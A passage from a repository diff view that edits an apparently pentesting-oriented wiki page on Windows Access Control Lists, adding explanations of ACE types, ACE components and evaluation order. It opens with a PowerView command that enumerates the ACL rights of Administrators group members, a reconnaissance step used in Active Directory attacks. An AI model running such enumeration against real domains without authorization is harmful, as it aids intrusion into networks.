Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights
|
||||
```
|
||||
|
||||
### Shared files and folders
|
||||
|
|
|
@ -22,7 +22,7 @@ Get Access Today:
|
|||
|
||||
## **Access Control List (ACL)**
|
||||
|
||||
An **ACL is an ordered list of ACEs** that define the protections that apply to an object and its properties. Each ACE identifies a security principal and specifies a set of access rights that are allowed, denied, or audited for that security principal.
|
||||
An **ACL is an ordered list of ACEs** that define the protections that apply to an object and its properties. Each **ACE** identifies a security **principal** and specifies a **set of access** rights that are allowed, denied, or audited for that security principal.
|
||||
|
||||
An object’s security descriptor can contain **two ACLs**:
|
||||
|
||||
|
@ -49,6 +49,23 @@ When a thread tries to access a securable object, the LSASS (Local Security Auth
|
|||
|
||||
If the LSASS finds ACEs, it compares the trustee SID in each ACE to the trustee SIDs that are identified in the thread's access token.
|
||||
|
||||
### ACEs
|
||||
|
||||
There are **`three` main types of ACEs** that can be applied to all securable objects in AD:
|
||||
|
||||
| **ACE** | **Description** |
|
||||
| ------------------------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| **`Access denied ACE`** | Used within a DACL to show that a user or group is explicitly denied access to an object |
|
||||
| **`Access allowed ACE`** | Used within a DACL to show that a user or group is explicitly granted access to an object |
|
||||
| **`System audit ACE`** | Used within a SACL to generate audit logs when a user or group attempts to access an object. It records whether access was granted or not and what type of access occurred |
|
||||
|
||||
Each ACE is made up of the following `four` components:
|
||||
|
||||
1. The security identifier (SID) of the user/group that has access to the object (or principal name graphically)
|
||||
2. A flag denoting the type of ACE (access denied, allowed, or system audit ACE)
|
||||
3. A set of flags that specify whether or not child containers/objects can inherit the given ACE entry from the primary or parent object
|
||||
4. An [access mask](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b?redirectedfrom=MSDN) which is a 32-bit value that defines the rights granted to an object
|
||||
|
||||
The system examines each ACE in sequence until one of the following events occurs:
|
||||
|
||||
* **An access-denied ACE explicitly denies** any of the requested access rights to one of the trustees listed in the thread's access token.
|
||||
|
@ -76,6 +93,8 @@ The canonical order ensures that the following takes place:
|
|||
* An explicit **access-denied ACE is enforced regardless of any explicit access-allowed ACE**. This means that the object's owner can define permissions that allow access to a group of users and deny access to a subset of that group.
|
||||
* All **explicit ACEs are processed before any inherited ACE**. This is consistent with the concept of discretionary access control: access to a child object (for example a file) is at the discretion of the child's owner, not the owner of the parent object (for example a folder). The owner of a child object can define permissions directly on the child. The result is that the effects of inherited permissions are modified.
|
||||
|
||||
|
||||
|
||||
![](<../../.gitbook/assets/image (9) (1) (2).png>)
|
||||
|
||||
\
|
||||
|
|
Loading…
Reference in a new issue